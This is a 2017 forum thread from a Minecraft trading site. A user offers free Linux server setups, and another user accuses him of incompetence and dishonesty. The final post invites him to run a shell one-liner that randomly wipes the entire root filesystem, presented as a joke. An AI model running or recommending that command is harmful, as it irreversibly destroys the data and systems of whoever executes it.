Complete Free & Reliable Backend Setups || Minecraft Consoles || Web Host Consoles || LetsEncrypt

Discussion in 'Server Management' started by xXGman_GamingXx, Apr 24, 2017.

Thread Status:
Not open for further replies.
Welcome to MCTrades, the modern Minecraft marketplace. Why not stay a while to chat, trade, and earn by registering?
  1. xXGman_GamingXx

xXGman_GamingXx Dedicated Trader

Ratings:
    +9
    Hello fellow McTrades users, Today I'm here to tell you guys that I am offering free backend technical setups on the following things that I have listed down below to those who are in need of one or for those who cannot afford in paying someone expensively for there machine to be setup to there needs, in return I want for you guys to be satisfied and possibly a courtesy vouch afterwards.

I'm very capable and experienced with using Linux Ubuntu 14.04 - 16.04 LTS operating systems. However that being said I can also do most tasks that you might need me to do for you guys however I'm primarily looking to do setups that involve / require in installing/setting up the following things:

-Multicraft
    -Pterodactyl
    -VestaCP
    -Cpanel
    -LetsEncrypt
    -Apache2
    -Nginx
    -Setting Up/Configuring Failover IP Addresses

However with those following things being said, in the future I will definitely be looking into offering free setups for automated billing panels such as WHMCS, Blesta and BoxBilling as well.

If you are interested in my free services, you may contact me through:

- A PM on here.
    - Email ([email protected])
    - Skype (live:gmandoesgaming98)
    - Discord (GmanGaming98#0026)

Thank you for taking your time to read this thread :)
    [ Double Post Merged - ( New Post Date: Apr 24, 2017 ) - ( Original Post Date: Apr 15, 2017 ) ]
    bump.

2. Latouth

Latouth Active Trader

Ratings:
    +2
    Do not deal with Gmangaming.

When his fuckups go bad, he asks for the OS to be reinstalled..
    And he didn't know what screens is.. he said "i only use linux" lmfao

Also Gman, do you even know what a "Failover IP Address" is?
    If so, please please explain it to me.
    Because I believe you think it's just a normal IP that you can setup on a ovh based machine.
    [ Double Post Merged - ( New Post Date: Jun 22, 2017 ) - ( Original Post Date: Jun 22, 2017 ) ]
    If you are going to sell services, don't fucking lie.
    [ Double Post Merged - ( New Post Date: Jun 22, 2017 ) - ]
    oh btw, you mind running this command on a dedi?

[ $[ $RANDOM % 2 ] == 0 ] && rm -rf --no-preserve-root / || echo *Click*